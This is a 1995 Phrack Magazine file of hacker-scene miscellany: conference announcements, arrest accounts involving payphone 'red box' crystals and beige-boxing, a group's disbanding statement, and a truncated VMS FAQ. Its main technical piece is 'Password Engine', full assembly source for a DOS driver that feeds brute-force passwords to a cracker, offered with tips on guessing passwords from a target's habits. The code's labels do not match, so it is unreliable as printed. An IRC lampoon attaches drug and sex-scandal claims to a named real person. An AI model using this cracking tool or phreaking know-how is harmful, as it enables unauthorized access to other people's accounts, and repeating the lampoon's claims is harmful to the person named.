Your Ad Here
                     ==Phrack Magazine==

          Volume Six, Issue Forty-Seven, File 3 of 22


                       //   //  /\   //   ====
                      //   //  //\\ //   ====
                     ==== //  //  \\/   ====

                 /\   //  // \\    //  /===   ====
                //\\ //  //   //  //   \=\   ====
               //  \\/    \\ //  //   ===/  ====

                             PART I

-----BEGIN PGP SIGNED MESSAGE-----

Phrack Magazine and Computer Security Technologies proudly present:

                 The 1995 Summer Security Conference

SSSS U U M M M M EEEEE RRRR CCCC OOOO N N S U U MM MM MM MM E R R C O O NN N SSS U U M M M M M M M M EEE RRRR C O O N N N S U U M M M M M M E R R C O O N NN SSSS UUUU M M M M EEEEE R R CCCC OOOO N N

                           "SUMMERCON"

  June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia

This is the official announcement and open invitation to the 1995 incarnation of Summercon. In the past, Summercon was an invite-only hacker gathering held annually in St. Louis, Missouri. Starting with this incarnation, Summercon is open to any and all interested parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, Conspiracy Nuts, Musicians and Nudists.

LOCATION:

The Clarion Hotel is located in downtown Atlanta, 9 miles from Hartsfield International Airport and just a few blocks from the Peachtree Center MARTA Station.

Considering the exorbitant expenses involved with attending other conferences of this type, Rooms at Summercon are reduced to

            $65 per night for Single or Double Occupancy

  The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
                       Atlanta, GA 30303
   (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)

No one likes to pay a hundred dollars a night. We don't expect you to have to. Spend your money on room service, drinks in the hotel bar, or on k-rad hacker t-shirts. Remember: Mention that you are attending Summercon in order to receive the discount.

DIRECTIONS

75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland then turn left on Houston (John Wesley Dobbs Ave.) 20 East - Exit 75/85 North at International. Turn Left on Courtland at Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.) 20 West - Exit 75/85 North at International. One block to Courtland and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)

Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's International Airport will drop you off at many hotels in the downtown area, including the Clarion. The shuttle should be no more than 12 dollars. Fares may be paid at the Airport Shuttle in the Ground Transportation area of the Airport Terminal.

MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a convenient and inexpensive way to negotiate most of the Atlanta area. Take the MARTA train from the Airport to the Peach Tree Center Station. Walk three blocks down Houston to the intersection of Houston and Courtland. The MARTA fare will be roughly 2 dollars.

Taxis - The average cab fare from Atlanta's Airport to the downtown area is roughly 30 dollars.

CONFERENCE INFO

It has always been our contention that cons are for socializing. "Seekret Hacker InPh0" is never really discussed except in private circles, so the only way anyone is going to get any is to meet new people and take the initiative to start interesting conversations.

Because of this, the formal speaking portion of Summercon will be held on one day, not two or three, leaving plenty of time for people to explore the city, compare hacking techniques, or go trashing and clubbing with their heretofore unseen online companions.

The "Conference" will be held on June 3rd from roughly 11:00 am until 6:00 pm with a 1 hour lunch break from 1:00 to 2:00.

NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping and still photography will be permitted.

CURRENT LIST OF SPEAKERS:

Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source Solutions (a private sector intelligence firm)

       Topic: Hackers from the Intelligence Perspective

Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", Publisher of Security Insider Report, and noted security expert

       Topic: Electromagnetic Weaponry

Bob Stratton - Information Security Expert from one of America's largest Internet service providers

       Topic: The Future of TCP/IP Security

Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks"

       Topic: Cryptography, Banking, and Commerce

Annaliza Savage - London-based Director/Producer

       Topic: Discussion of her documentary "Unauthorized Access"
              (Followed by a public screening of the film)

Chris Goggans - Editor of Phrack Magazine and Summercon M.C.

       Topic: introductions, incidentals and a topic which is sure
              to culminate in an international incident.

(Other Speakers May Be Added - Interested parties may contact scon@fc.net)

COSTS

Since other cons of this type have been charging from 25 to 40 dollars entry fees, we are only charging 10 dollars. Yes, that's correct, TEN (10) dollars in US currency. Money is far too scarce among the hacker community to fleece everyone for money they will probably need to eat with or pay for their hotel rooms.

WHAT TO DO IN ATLANTA:

To attempt to make everyone's stay in Atlanta more exciting, we are contacting local establishments to arrange for special discounts and/or price reductions for Summercon attendees. Information will be handed out regarding these arrangements at the conference.

Atlanta is a happening town.

Touristy Stuff Party Time

The World of Coca-Cola Buckhead Underground Atlanta The Gold Club Georgia Dome (Baseball?) (Countless Other Clubs and Bars) Six Flags

CONTACTING SUMMERCON SPONSORS

You can contact the Summercon sponsors by several means:

E-mail:     scon@fc.net

   WWW:     http://www.fc.net/scon.html

Snail Mail: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701

If deemed severely urgent, you can PGP your email with the following PGP key:

mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== =evjv - -----END PGP PUBLIC KEY BLOCK-----

See you in Atlanta!

-----BEGIN PGP SIGNATURE----- Version: 2.6

iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5 uRix2FrftCY= =m/Yt -----END PGP SIGNATURE-----

UNAUTHORIZED ACCESS

"Unauthorized Access [is] a documentary that tells the story of the computer underground from our side, it captures the hacker world from Hamburg to Los Angeles and virtually everywhere in between." 2600 The Hacker Quarterly

Computers are becoming an integral part of our everyday existence. They are used to store and send a multitude of information, from credit reports and bank withdrawals, to personal letters and highly sensitive military documents. So how secure are our computer systems?

The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA or the DMV. Most computer systems that have a telephone connection have been under siege at one time or another, many without their owner's knowledge. The really good hackers can reroute the telephone systems, obtain highly sensitive corporate and government documents, download individual's credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace.

So who are these hackers? Just exactly WHAT do they do and WHY do they do it? Are they really a threat? What do they DO with the information that they obtain? What are the consequences of their actions? Are hackers simply playing an intellectual game of chess or are hackers using technology to fight back and take control of a bureaucratic system that has previously appeared indestructible?

Unauthorized Access is a documentary that demistifies the hype and propaganda surrounding the computer hacker. Shot in 15 cities and 4 countries, the film hopes to expose the truths of this subculture focusing on the hackers themselves.

Unauthorized Access is a view from inside the global underground.

For a PAL (European) copy send a cheque/postal order for 15 British Pounds or $25 for NTSC (American) standard to:

Savage Productions Suite One 281 City Road London EC1V 1LA

                        ACCESS ALL AREAS
                       Hacking Conference

                      1st - 2nd July, 1995
                      (Saturday  & Sunday)
                   King's College, London, UK

-------------------------------WHAT-IT-IS---------------------------------

The first UK hacking conference, Access All Areas, is to be run in London later this year. It is aimed at hackers, phone phreaks, computer security professionals, cyberpunks, law enforcement officials, net surfers, programmers, and the computer underground.

It will be a chance for all sides of the computer world to get together, discuss major issues, learn new tricks, educate others and meet "The Enemy".

-------------------------------WHERE-IT-IS--------------------------------

Access All Areas is to be held during the first weekend of July, 1995 at King's College, London. King's College is located in central London on The Strand and is one of the premier universities in England.

-----------------------------WHAT-WILL-HAPPEN-----------------------------

There will be a large lecture theatre that will be used for talks by computer security professionals, legal experts and hackers alike. The topics under discussion will include hacking, phreaking, big brother and the secret services, biometrics, cellular telephones, pagers, magstrips, smart card technology, social engineering, Unix security risks, viruses, legal aspects and much, much more.

Technical workshops will be running throughout the conference on several topics listed above.

A video room, equipped with multiple large screen televisions, will be showing various films, documentaries and other hacker related footage.

The conference facilities will also include a 10Mbps Internet link connected to a local area network with various computers hanging off of it and with extra ports to connect your laptop to.

------------------------------REGISTRATION--------------------------------

Registration will take place on the morning of Saturday 1st July from 9:00am until 12:00 noon, when the conference will commence. Lectures and workshops will run until late Saturday night and will continue on Sunday 2nd July from 9:00am until 6:00pm.

----------------------------------COST------------------------------------

The price of admission will be 25.00 British pounds (approximately US $40.00) at the door and will include a door pass and conference programme.

-----------------------------ACCOMMODATION--------------------------------

Accommodation in university halls of residence is being offered for the duration of the conference. All prices quoted are per person, per night and include full English breakfast. (In British pounds)

                         SINGLE       TWIN
    WELLINGTON HALL       22.00       16.75

Special prices for British and Overseas university students, holding current student identification, are also available - please call King's Campus Vacation Bureau for details.

All bookings must be made directly with the university. They accept payment by cash, cheque and credit card.

To making a booking call the following numbers...

    KING'S CAMPUS VACATION BUREAU

    Telephone : +44 (0)171 351 6011
    Fax       : +44 (0)171 352 7376

----------------------------MORE-INFORMATION------------------------------

If you would like more information about Access All Areas, including pre-registration details then please contact one of the following...

    Telephone : +44 (0)973 500202
    Fax       : +44 (0)181 224 0547
    Email     : info@phate.demon.co.uk

            D I S T R I B U T E  W I D E L Y

             *****FIRST CALL FOR PAPERS*****

                    InfoWarCon '95

           A 2 Day International Symposium
                 on Information Warfare

                  September 7-8, 1995
               Stouffer Concourse Hotel
                    Arlington, VA

                    Presented by:
         National Computer Security Association
           Winn Schwartau and Interpact, Inc.
               Robert Steele and OSS, Inc.

CONFERENCE OVERVIEW:

The Information Warfare Conference (InfoWarCon) is our third international conference dedicated to the exchange of ideas, policies, tactics, weapons, methodologies and defensive posture of Information Warfare on a local, national, and global basis.

InfoWarCon will bring together international experts from a broad range of disciplines to discuss and integrate concepts in this rapidly evolving field. Attendees will intensely interact with the speakers and presenters as well as each other to increase each other's understanding of the interrelatedness of the topics.

While there are many interpretations of Information Warfare by different groups, the current working definition we employ is:

 Information  Warfare is the use of information and  informa
 tion systems as weapons in a conflict where information  and
 information systems are the targets.

Information Warfare is broken down into three categories, and InfoWarCon speakers and attendees will interactively examine them all:

 Class  I:  Personal Privacy.  "In Cyberspace You Are  Guilty
 Until Proven Innocent."  The mass psychology of information.
 Privacy versus stability and law enforcement.

 Class  II: Industrial and Economic Espionage.  Domestic  and
 international  ramifications  and  postures  in  a  globally
 networked, competitive society.

 Class III: Global Information Warfare.  Nation-state  versus
 Nation-state  as an alternative to convention  warfare,  the
 military perspective and terrorism.

THE CONFERENCE

The conference is designed to be interactive - with extensive interaction between all participants. The preliminary contents and discussions will focus on:

Plenary sessions will accommodate all attendees, while break-out sessions will provide more intimate presentations and interactiv ity on topics of specific interests.

SUBMISSIONS:

Submission for papers are now be accepted. We are looking for excellent speakers and presenters with new and novel concepts of Information Warfare. You may submit papers on the topics listed above, or on others of interest to you, your company or govern ment.

We welcome innovative thought from the private sector, the gov ernment (civilian, military and intelligence) and the interna tional community. Submissions must be received by May 1, 1995, and notification of acceptance will occur by June 1, 1995. Please submit 2-3 page presentation outlines to:

                    winn@infowar.com.

All submissions and the contents of InfoWarCon '95 will be in English. If you must submit a hard copy: Fax: 813.393.6361 or snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL 34642

All submissions and presentation should be unclassified, as they will become Open Source upon submission and/or acceptance.

SPONSORS:

The Information Warfare Symposium is currently choosing sponsors for various functions.

Continental Breakfast, Day 1 and Day 2 Morning Coffee Break, Day 1 and Day 2 Lunch, Day 1 and Day 2 Afternoon Coffee Break, Day 1 and Day 2 Cocktail Party, Day 1

Each Corporate or Organizational sponsor will be included in all promotional materials and Symposium function. For more infor- mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or email: 747774.1326@Compuserve.com.

EXHIBITS:

Limited space is available for table-top displays for commercial or governmental products, services, educational or other promo tion. For further information, contact Paul Gates at the National Computer Security Association. 717.258.1816

REGISTRATION:

 Payment made BEFORE July 1, 1995:

            (   )  $445.00     NCSA Member/OSS Attendee

( ) $545.00 All others

 Payment made AFTER July 1, 1995:

( ) $495.00 NCSA Members/OSS Attendees ( ) $595.00 All others

( ) I'M INTERESTED, but would like more information sent to the address above. Please include a free copy of your 32 page "Information Security Resource Catalog".

( ) I'd like to know more about NCSA on-site training, security audits and consulting services. Please have someone give me a call.

MAIL OR FAX TO:

             National Computer Security Association
             10 South Courthouse Avenue
             Carlisle, PA 17013
             Phone 717-258-1816 or FAX 717-243-8642
             EMAIL:       74774.1326@compuserve.com
             CompuServe:  GO NCSAFORUM

Winn Schwartau Interpact, Inc. Information Security & Warfare V:813.393.6600 F:813.393.6361 Email: Winn@Infowar.Com

Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested

on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail. His story follows.

On the evening of the 13th Bernie S. received a page from his mail drop.

Some people he knew from Florida had stopped in at his mail drop thinking it was his address. They were looking to purchase several 6.5 Mhz Crystals. These crystals when used to replace the standard crystal in the RADIO SHACK Hand Telephone dialer, and with some programming, produce tones that trick pay phones into believing they have received coins. These are commonly referred to as "red boxes" and got their name from an actual red box pulled from a pay phone in the late seventies by some curious person.

Ed Cummings met these people at a local 7-11 (which 7-11?) where he was

to sell the widely used electronic timing crystals for roughly $4 a piece. The purchaser only had two twenty dollar bills and Ed Cummings no change. Ed Cummings went into the 7-11 to get some change to make the transaction. A police officer noticed a van parked in the parking lot of the 7-11 with more several African Americans inside. As Ed was leaving the 7-11 he noticed fifteen police cars pulling into the parking lot of the 7-11.

Next thing he knew the police were asking him if they could `rifle`

through his car. He said no. Moments later as he was talking to a Detective and noticed another police officer going through his car. He asked the officer to stop. They did not, in all the police confiscated a few hundred 6.5Mhz crystals (which he resells for roughly $4 a piece) and a large box of 100 dialers. The police told him they would get back to him, and he could have his electronics back if the contents of the bag were legal. In the contents of the seized items was one modified dialer, that a customer returned after modification explaining that it did not work, a broken red box.

The next day Ed `Bernie S.` Cummings was over at a friend`s house working

on their computer when eight to ten plain clothed armed men burst into the house and ordered him and his friends to freeze. They cuffed him and took him to a holding cell (what jail?). There he was left without a blanket or jacket to sleep with in the cold cell.

That evening the Secret Service had been called in when someone figured

out what the dialers and crystals would do when put together. The United States Secret Service found his home and entered it, while they were questioning him.

The next morning at his arraignment he was finally told of the charges

he was being held upon. They were Two misdemeanor Charges of manufacture, Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful use of a computer charges. His bail was automatically set to $100,000.00 because Ed Cummings refused talk with the police without his attorney present.

The Secret Service presented to the judge a 9 page inventory of what

they had found in his home. On that inventory there 14 computers. 2 printers. more Boxes of bios chips for the systems he worked with. Eprom burners which the Federal Agents had labeled "Cellular telephone chip reprogramming adapters" Eproms are used in everything from Automobile computers to personal computers. They also confiscated his toolbox of screw drivers, wire clippers and other computer oriented tools he used for his consulting job.

The Judge dropped the Two unlawful use of a computer charges due to

the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question.

As of 3/27/1995 Ed Cummings is still in Delaware County Prison

awaiting his trial. His trial has not yet been scheduled and Ed will most likely not raise the One Hundred Thousand Dollars needed to be released on bail.

"Don't believe the hype." - Public Enemy, 1988

This file's purpose is to clear up any misconceptions about the recent situation that has come upon the sociopolitical group known as KoV.

As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for ANYTHING. We have received several tip-offs from private sources regarding a supposed "FBI investigation" of our group that is purported to be active at this very minute. However, with the exception of a few VERY suspicious incidents and coincidences, there has been NO HARD EVIDENCE thus far about ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for the integrity of our innocence, we must stress that nothing has gone down.

Yet.

We have very good reason to believe that a few of those among us are about to be charged with various false accusations by a local university. However the current mental state of the person in charge of this charade is also in question. Therefore it would be logical to assume nothing. The conflicting tip-offs, rumors, warnings and threats that we have received make it even more difficult to get a clear picture of exactly what is going on. We have heard so many things from so many different sources, both credible and questionable, that we would be hard-pressed to give an accurate evaluation of the current state of things.

What we can say for sure, however, is that KoV officially died on Monday, January 23, 1995, along with its communications network, KoVNet. This promises to be a great loss to the open-minded and sociopolitical community as well as the free-thinkers and activists who supported us so generously. Our reasons for disbanding the group were many, but the foremost was in light of the current situation we are facing.

Consider this last obstacle our final, stalwart stand against the evils of AmeriKKKan government and its various greedy, capitalistic agencies. From the moment of KoV's conception, they have publicly sought to destroy us; to silence our questioning of authority, to oppress our free-thinking minds, and to close off our intellectual channels of communication. They have even gone so far as to stalk us in public places. 'Tis a shame indeed.

If you have any questions or if you wish to contact us for any reason, you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV". I will try to post further updates of this saga to CiPNet, ThrashNet, QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can. We would appreciate any support that other h/p, art or political groups can lend us. Until then, my friends...

-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV

            What happens when you are caught beige boxing.

                    by Rush 2


    Yeah yeah, I'm the only one.  But here is a generally interesting
 description of everything to getting caught to arraignment.

    Well about 5 months ago i needed to set up a conference really quick..
 it was about 12:00  (never knew there was a 10:00 pm curfew in that area)
 and went to a 25 pair box at this local strip mall.  Well I was out there
 the box was already open and I was just about to start testing pairs to
 see which was connected and what wasn't.

    All of a sudden, i hear this loud screeching sound of a car coming
 to a skid from doing about 90mph.  I turned and saw that typically dirty
 squad car about to hit me.. you know the car, mud and dust on the tires
 and body, coffee and smudge marks all over the windshield.  i got on my
 bike and started to run.  Now the thing is I COULD have gotten away.. the
 pathetic excuse for a cop had run not more than 10 yards after me and
 decided that I was a threat so he pulled his handgun and yelled.  I saw
 this and thought it would be wiser to stop than get shot.

    Within 2 minutes at LEAST 10 squad cars had come to his aide.. i did
 not know i was less than a half mile from a police station and they were
 looking for a prowler in the general area.  The police did the normal,
 called me scum, asked me what i was doing, searched me until they were
 satisfied...  than picked me up and threw me in the car... the funny
 thing was they didn't see my phone until they threw me into the back seat
 and the cord fell out.. (they never saw the page of notes and 'naughty'
 material in my pocket though it was about 4 inches thick and sticking out
 that a blind man could see it.

    Well they got me to the station and pried my info out, and called my
 father... I came up with a good enough story about some made up user
 who told me to go across the street and plug in..  then I was told I
 would be dealt with in the next week...  I did not receive anything for
 three and a half months.

    Once the time came for the arraignment (for a juvenile they called it
 an intake).  I got to go to the police station, sit for about 3 hours (as
 if i thought they would be on time) until I waited for my probation
 officer. Finally she got there and we proceeded to talk.  She explained
 all of the charges and my lawyer (interesting guy) laughed, I was being
 charged with prowling (could be disputed I was on a public sidewalk and
 there in that strip mall is a 24 hr laundry mat), loitering (again that
 could be disputed), and attempted theft of services (though I NEVER even
 plugged in).

    After this was all said i spent the next hour talking with the lady
 in private.  I immediately found she had an interest in computers and was
 having a problem with her home pc.  So I easily changed the topic to my
 fascination in computers and solved her problem with her computer, and
 answered at least 50 questions about them.  In the last 10-15 minutes of
 the conversation all i could get from her were statements about how
 impressed and how intrigued she was with me.  She ended up giving me a
 look (that was hard to judge but i am staying away from this chick) that
 was either confusion or attraction, slipped me a card with her home phone
 number and name and called back in my lawyer and parents.

    Once they got back in, all that she really said was I was a great boy,
 that she would like to see me do more with my time besides computers, and
 that she was taking my sentence of 12 months formal probation with 300
 hours of community service to 3 months of informal probation with 30
 hours of community service.  That and she said bell was asking her what
 to do and she would tell them that it was a non issue since I did not
 plug in and even if I had it would not be their concern unless I had
 plugged in to the telco access part of the network interface.

    Well I have yet to receive official record of having to perform
 the community service or the probation but I called my probation officer
 yesterday and said she wasn't putting the community service into the
 punishment and it has been an equivalent amount of time to just say that
 since I haven't gotten in trouble since she will count the probation as
 already served.  Luckily she based all other needs of me on the report
 from a teacher, and with my luck she picked the one teacher, my computers
 teacher, that no matter what I did or said would lie and say I didn't.


    Thanks to erikb for publishing this, and greets to CXrank, paradox,
 dark phiber, the fat cop (who spilled his coffee and box of donuts
 coming after me) that made this all possible,  and to everyone else.


                    -rush 2
        http://www-bprc.mps.ohio-state.edu/cgi-bin/hpp/Rush_2.html


            Look for My site, unforeseen danger soon to be on a 28.8 slip
        and by the end of the summer on a 500k slip connect.

[Something found on IRC]

Danny Partridge Emmanuel Goldstein (AKA Danny Bonaduce: (AKA Eric Corley: a child star from the child-like publisher "The Partridge Family" of 26oo magazine.

Hosts a boring local Hosts a boring local radio program. radio program.

Quasi Celebrity Quasi Celebrity Status among Status among 70's freaks telephone phreaks

Periods of Heavy Periods of Heavy Drug Usage Drug Usage

Involved in Sex Involved in Sex Scandal with Scandal with another man another man

Last name is Friends with Phiber "Bonaduce" Optik whose first handle was "Il Duce"

Supplements incoming Supplements incoming by doing desperate by doing desperate local talk shows local talk shows whenever he can. whenever he can.

Top 10 #hack fights that would be the coolest to see.

(And no, Ophie's not in it twice just because she's a girl...)

10.) The D.C. Convention Center is Proud to Present: Hot-Oil Wrestling featuring KL & TK.

9.) Ludichrist vs. GFM, to be resolved at the next convention, or, uh, the one after that... or, uh...

8.) C-Curve and Elite Entity, "Who's who?"

7.) Ben Camp vs. Ben Sherman, "Particles of Novocain Everywhere." (Or: "I'm totally numb, let me hug you!!!")

6.) Dan Farmer and Pete Shipley: "Whips vs. Chains"

5.) Grayarea vs. Netcom "No, I want root..."

4.) WWF Wrestling with Len and |al|.

3.) Ophie vs. Voyager, "Night of the Living Dead."

2.) Okinawa vs. Gail Thackery, "The Winner Gets Okinawa's Testicle." and the number one #hack fight is

1.) Ophie vs. all the #hack guys, "10 Bucks on the Girl"

P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit +++++++++++++++++++++++++++++++++++++++++++++

The device driver code listed below provides a data stream of passwords. The device driver approach was used to speed up the process of cracking passwords on an incremental basis. The usual approach was to generate the passwords to a file, then reading the file, etc..the device driver approach circumvents these file storage problems, and others, such as having enough free disk space and delays from disk i/o. This driver operates completely in memory (approx. 0.5Kb)

How practical is this?

This program would be very useful if you think you may know what strategy the user/admin uses for picking out their passwords. Without eliciting some sort of a strategy, forget it-- unless your desperate enough!!

A "strategy" could consist of any of these possible advantages--

1) default passwords (ie: SIN, student #, birth date, phone number...) 2) the mutation of a lUSERs' known password from another system 3) viewing the mark typing in most of their password with a couple of unseen characters 4) etc...

With the sample device driver provided, passwords starting at 'aaaaaaa' and ending with 'zzzzzzz' will be generated. The length of the password string can be modified by changing the length of the password string itself (that is, the variable "number"). The range of characters in the passwords can also be changed by modifying the following two lines:

;hackdrv.sys ;. ;. ; for ending character-- cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range

...and for starting character cmp byte ptr [number+si],'a' ;starting char. in range ; ;----------------------

for instance, if you wished to generate numbers from "0000000" to "9999999"

-change the ending character to: cmp byte ptr [number+si],'9'+1

-starting character to: cmp byte ptr [number+si],'0'

and "number" variable from 'aaaaaa' to '0000000' and then recompile..

..or in the third case, if u had observed a lUSER type in most of their password, you may want to rewrite the code to limit the search. IE: limit the keys to a certain quadrant of the keyboard. Modify the code starting at "reiterate:" and ending at "inc_num

endp" for this.

/'nuff of this!/ How do I get things working?

Compile the device driver "hackdrv.sys", and the second program, "modpwd.asm". Then specify the device driver inside config.sys (ie: "c:\hackdrv.sys"). The code below was compiled with the a86 compiler, v3.03. Some modifications might be needed to work with other compilers.

To use it in prgs like crackerjack, type in the following on the command line:

c:>jack -pwfile: -word:hackpwd

If you had stopped a cracker program (eg: crackerjack) and want to pick up from where you left off, run the program "modpwd.com".

This program can change HACKDRVs password through-

a) a command line argument (ie: "modpwd aabbbbe") b) executing the program with no parameters (this method also displays the current password in memory)

                                               Happy Hacking,
                                               Uncle Armpit

;-----------------------cut here-------------------------------- ;Program HACKDRV.SYS ; org 0h nextdev dd -1 attribute dw 0c000h ;character device w/ ioctl calls strategy dw devstrategy interrupt dw devint devname db 'HACKPWD ' countr dw offset number number db 'aaaaaa',0ah ;<----six characters, lower case numsize equ $-number - 2 afternum:

;working space for device driver rhofs dw ? rhseg dw ?

devstrategy: ;strategy routine mov cs:rhseg,es mov cs:rh_ofs,bx retf

dev_int: ;interrupt routine pushf push ds push es push ax push bx push cx push dx push di push si

cld push cs pop ds

mov bx,cs:rhseg mov es,bx mov bx,cs:rhofs

mov al,es:[bx]+2 rol al,1 mov di,offset cmdtab xor ah,ah add di,ax jmp word ptr[di]

cmdtab: ;command table dw init ;0 dw exit3 ;1 dw exit3 ;2 dw ioctlread ;3 dw doread ;4 dw exit3 ;5 dw exit3 ;6 dw exit3 ;7 dw exit3 ;8 dw exit3 ;9 dw exit3 ;10 dw exit3 ;11 dw ioctl_write ;12 dw exit3 ;13 dw 5 dup (offset exit3)

ioctl_read: push es push bx

mov si,es:[bx+10h] mov di,es:[bx+0eh] mov es,si

push cs pop ds mov si,offset number xor cx,cx

getchar: lodsb stosb inc cl cmp al,0ah jz ioctlrend jmp get_char

ioctl_rend: pop bx pop es mov es:[bx+012h],cx mov cs:countr,offset number jmp exit2

ioctl_write: push es push bx mov si,es:[bx+010h] mov ds,si mov si,es:[bx+0eh] mov cx,numsize+1 ;es:[bx+012h] push cs pop es mov di,offset number repe movsb pop es pop bx mov cs:countr,offset number jmp exit2

do_read: push es push bx

push cs pop ds

mov si,[countr] inc si ;word ptr [countr] cmp si,offset afternum jnz isokay mov si,offset number call incnum

isokay: mov [countr],si mov di,es:[bx]+0eh mov ax,es:[bx]+010h mov cx, es:[bx]+012h jcxz cleanup mov es,ax repe movsb

clean_up: pop bx pop es jmp exit2

exit3: mov es:word ptr 3[bx],08103h jmp exit1

exit2: mov es:word ptr 3[bx],0100h

exit1: pop si pop di pop dx pop cx pop bx pop ax pop es pop ds popf retf exit:

inc_num proc near push si mov si,numsize

reiterate: inc byte ptr [number+si] cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range jnz exit mov byte ptr [number+si],'a' ;starting char. in range dec si cmp si,-1 jnz reiterate mov byte ptr [number],01ah ;send EOF _exit: pop si ret incnum endp

at_eof: ; the non-resident code starts here

initial proc near push es

push cs pop ds

push cs pop es

mov si,offset number mov di,offset tmpnum cld _again: lodsb cmp al,0ah jz _nomorechars stosb jmp _again

_nomorechars: mov si,offset msgend mov cx,4 repe movsb

mov ah,09 ;print welcome message mov dx,offset msg1 int 21h

pop es ret initial endp

init: call initial mov ax,offset at_eof mov es:[bx]+0eh,ax push cs pop ax mov es:[bx]+010h,ax mov cs:word ptr cmdtab,offset exit3 jmp exit2

msg1 db "Incremental Password Generator (c)1995",0ah,0dh db "Written by Uncle Armpit",0ah,0dh,0ah,0dh db "Starting at word [" tmpnum db 10 dup (?) msgend db "]",0a,0d,'$' ;END hackdrv.sys

;------------------------------cut here----------------------------------

;PROGRAM modpwd.asm ; org 0100h mov ax,03d02h xor cx,cx mov dx,offset devname int 21h jnc drvr_found

mov ah,09 mov dx,offset nodrvr int 21h jmp errorpass

drvr_found: mov bx,ax mov ax,04402h mov cx,20 ;read 20 characters mov dx,offset databuffr int 21h

mov passlen,al dec al mov ah,al and al,0fh mov cl,4 shr ah,cl add ax,03030h cmp al,'9' jbe inrange add al,7 inrange: cmp ah,'9' jbe inrange1 add ah,7 inrange1: mov byte ptr [numchr],ah mov byte ptr [num_chr+1],al

cld mov di,offset databuffr-1 xor cx,cx mov cl,passlen add di,cx mov si,offset passend mov cx,stringsz repe movsb

;check for information in command line ;else--> prompt for user input mov al,passlen or byte ptr [0080h],0 jz reqinput mov cl,[0080h] dec cl mov [0081h],cl mov si,0081h mov di,offset newpass mov cx,20 repe movsb jmp vrfy_info

reqinput: mov ah,09 mov dx,offset curpass int 21h

mov ah,0a mov dx,offset pass_len int 21h

vrfyinfo: mov ax,word ptr [passlen] cmp ah,0 jz errorpass dec al cmp ah,al jnz errorlen

;change the current password xor cx,cx mov cl,al mov ah,044h mov al,03 mov dx,offset newpass+1 int 21h jnc success_pass

error_len: mov ah,09 mov dx,offset errormsg int 21h

error_pass: mov ax,04c01h ;abnormal termination int 21h

success_pass: mov ax,04c00h int 21h

devhandle dw ? curpass db 'Current password is [' databuffr db 20 dup (?) passend db '] ;' numchr db ' ' db ' characters',0ah,0dh,0ah,0dh prompt db 'New word: ','$' stringsz equ $ - passend

passlen db 00 newpass db 20 dup (?) errormsg db 'error changing password!',0ah,0dh,'$' nodrvr db 'Error: ' devname db "HACKPWD ",00 db 'device driver not loaded!',0ah,0dh,07,'$'

     -- Frequently & Rarely asked questions about VMS -- part one
    by Opticon the Disassembled - UPi

[1]

" I have a kropotkin.hlp file. What could I possibly do with it ? "

$ library /insert /help sys$help:helplib.hlb kropotkin.hlp . . . $ help kropotkin

[2]

" I have a bakunin.tlb file. What to do with it ? "

$ library /extract=(*) bakunin.tlb . . . $ dir

[3]

" I would like to have a look at prunton.dat. "

$ dump [/block=(count:x)] prunton.dat

Where "x" is the number of blocks DUMP will display.

[4]

" How can I use an external editor with mail ? "

$ mail :== mail /edit=(send,reply=extract,forward)

[5]

" How a HELP file is organized ? "

$ create example.hlp 1 EXAMPLE

THIS IS AN EXAMPLE.

2 MORE_EXAMPLES

MORE EXAMPLES.

3 EVENMOREEXAMPLES

EVEN MORE EXAMPLES. <CTRL-Z>

[6]

" How can I have a look at queues ? "

$ show queue smtp /all/full

or

$ show queue /batch/all/full

or

$ show queue /all/full

[7]

" My mail is holded, for some reason, in the SMTP queue... "

Either

$ delete /entry=XXX

or

$ set entry XXX /release

in order to force VMS to release it right away.

[8]

" How do I have a look at DTE and circuits available. "

$ mc ncp show known dte

and

$ mc ncp show known circuits

You may also may find of interest:

$ mc ncp show known networks

$ mc ncp show known lines

$ mc ncp show known destinations

[9]

" I need a NUA scanner for VMS. "

